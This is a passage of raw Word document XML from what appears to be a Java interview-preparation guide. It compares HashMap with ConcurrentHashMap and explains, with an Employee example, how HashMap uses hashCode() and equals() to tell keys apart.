        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C085A2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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="077648C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FD2DB4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92DCB" w:rsidRPr="00CE4B95" w14:paraId="16622499" w14:textId="77777777" w:rsidTr="00B43006">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1479812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145DB388"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69BD1882"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designed for concurrent access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D92DCB" w:rsidRPr="00CE4B95" w14:paraId="3D8AFA71" w14:textId="77777777" w:rsidTr="00B43006">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E22AE3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3833DE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locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CEA2499"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segment or bucket-level)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D92DCB" w:rsidRPr="00CE4B95" w14:paraId="3BE280D6" w14:textId="77777777" w:rsidTr="00B43006">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17B69A7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534FAF4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usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3304028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 overhead due to thread-safety but better concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D92DCB" w:rsidRPr="00CE4B95" w14:paraId="59593092" w14:textId="77777777" w:rsidTr="00B43006">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B75729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3BB38A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multiple null values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2078E79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values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D92DCB" w:rsidRPr="00CE4B95" w14:paraId="6E067A79" w14:textId="77777777" w:rsidTr="00B43006">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DA92B07"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Methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DE48B2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tomic operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73BB2850"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etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D92DCB" w:rsidRPr="00CE4B95" w14:paraId="74DF0C2B" w14:textId="77777777" w:rsidTr="00B43006">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0995661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379B2F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 sync</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2ED3227E"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high-concurrency scenarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D92DCB" w:rsidRPr="00CE4B95" w14:paraId="431D1E61" w14:textId="77777777" w:rsidTr="00B43006">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BE2CA0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366C4FE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 full locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7442D61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out locking the entire map</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F23553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98900F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hen you don't need thread safety, and you need optimal performance in single-threaded scenarios or when managing synchronization manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F7B3D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87" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFA185D"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205" w:name="_Toc197867419"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How is HashMap faster as compared to ConcurrentHashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205"/>
    </w:p>
    <w:p w14:paraId="71DB3289" w14:textId="7A049448" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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generally </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>faster than ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in single-threaded scenarios due to its simpler design and lack of synchronization overhead. Here's a detailed explanation of why HashMap is faster in comparison to ConcurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012E9AC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ck of Synchronization in HashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F3574B"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re's no overhead of managing thread safety, the operations on HashMap are executed more quickly in a single-threaded context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2339940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72F0F9E1" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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uses mechanisms like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cket-level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o ensure thread-safety in multi-threaded environments. While this provides excellent performance under concurrent access, the internal locking and atomics add overhead to operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AF1A1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mpler Data Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55878BE3" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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the other hand:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7FDB19" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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has more complex internals. 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currency Overhead in ConcurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304E8711"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specifically designed for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scenarios.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you perform an operation (like put(), get(), or remove()) on a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, there is still some inherent overhead from managing the concurrency control mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5553C3B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987D7DD" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>putIfAbs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uteIfAbs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are atomic and involve more complex internal logic to ensure thread safety. These operations require synchronization mechanisms, such as CAS, which adds overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B70FC5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Mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788DAB9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Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not have locks or any synchronization mechanism, making its operations faster in the absence of multi-threading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFD723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Tradeoff:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B59EB98" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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xml:space="preserve"> comes at a cost. In ConcurrentHashMap, operations are designed to be safe in a multi-threaded environment. For example, the method putIfAbsent() checks if a key is already mapped and only puts a new entry if the key is absent. This requires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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, adding some performance overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AFFFD6"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11F67183" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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 and Context:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F21034A"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single-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ill always be faster because it doesn't deal with the overhead of managing concurrent access or maintaining thread safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5087DDD6"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multi-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130"/>
        <w:gridCol w:w="5188"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DA3149" w:rsidRPr="00CE4B95" w14:paraId="7268DE92" w14:textId="77777777" w:rsidTr="00D32F5E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="129BF940"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4B5C8DF"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4CE7C477"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A3149" w:rsidRPr="00CE4B95" w14:paraId="256C4809" w14:textId="77777777" w:rsidTr="00D32F5E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C2F82F9"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C04EB8"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3D98AE8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upports concurrent access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA3149" w:rsidRPr="00CE4B95" w14:paraId="413E672F" w14:textId="77777777" w:rsidTr="00D32F5E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="461456B0"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54E7A7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context</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EBD5A4E"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 single-threaded due to concurrency mechanisms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA3149" w:rsidRPr="00CE4B95" w14:paraId="2268C072" w14:textId="77777777" w:rsidTr="00D32F5E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="120951DD"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nal Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A96525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rray with linked list or tree</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43E0CEC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or segment locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA3149" w:rsidRPr="00CE4B95" w14:paraId="42F481AD" w14:textId="77777777" w:rsidTr="00D32F5E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27AB925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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C199434"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locking (no synchronization)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C577A1C"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cket-level or segment-level locking, atomic operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA3149" w:rsidRPr="00CE4B95" w14:paraId="7BE507FD" w14:textId="77777777" w:rsidTr="00D32F5E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="391FAD4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F47580F"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environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F09F411"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environments with high concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C70709F"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09D330B" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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xml:space="preserve"> tha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ngle-threaded scenarios because it doesn't involve synchronization overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BBF813" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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However, in a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context,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better</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it handles concurrency more efficiently by allowing threads to access different parts of the map concurrently without causing data corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681FEAB7" w14:textId="1E2CF1F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88" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C08C20D" w14:textId="68D0C0E5" w:rsidR="00B967F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B967F0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="206" w:name="_Toc197867420"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Suppose I have multiple Employee objects with different names, so how does HashMap differentiate between different objects?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206"/>
    </w:p>
    <w:p w14:paraId="0BF7417F" w14:textId="58376DE5" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D4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different objects using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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27986B1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how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multiple Employee objects (or any objects in general):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5250C4"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79F13422"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n object into a HashMap, the hashCode() method is called to compute a hash value (an integer) for the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356A00C0"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Code() value helps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lot</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the internal array where the object will be stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAB9E17"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 with different hashCode() values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be placed in different buckets. However, two objects with the same hashCode() value will be placed in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same bucket</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DCB81D"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26900F9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computing the hash code and placing the object in the corresponding bucket,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needs to ensure that no two objects with the same key exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB40D7E"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ollision occurs (i.e., two objects have the same hashCode() value), the equals() method is called to check whether the objects are truly equal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39768699"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equals() method compares the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>actual conten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of the objects. If the equals() method returns true, it means the two objects are considered identical (even if they are distinct objects in memory).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13165DB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f the equals() method returns false, it means the objects are different, and they can be stored in the same bucket without causing any issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C172AC6"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Differentiating Employee Objects in a HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD0C53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say you have an Employee class with the name field:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072AE6A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3DEC74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648F638D" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BEB0EFB"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33AAAF9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61E153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B21642E" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B0D1A3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0B2AF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20B676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A8BB50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CFE72" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73AA561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 and equals to differentiate employees based on name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B4D7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CC1860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73F46A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Generate hash based on name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41876B8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536F2" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B89A30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40177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7D10B7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9B2C3C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A0C9AE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loyee = (Employee) obj;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A071C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equals(employee.name);  // Compare employees based on name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763AC16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1A76E4" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4FE70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D5E444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046EC1C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280D6CB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0FF4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2B89E3" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A55A3E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27DB7F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07AA3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Employee, String&gt; employeeMap = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1ADDC0" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB9BE5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mployees to the HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C7837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Engineer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0B5C1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Bob", 25), "Developer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD90C30"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Senior Engineer"); // Duplicate name with same age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB576DD" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E9DC5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values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B3F7B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Map.Entry&lt;Employee, String&gt; entry : employeeMap.entrySet()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44344C0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try.getKey() + " =&gt; " + entry.getValue());</w:t>
      </w:r>
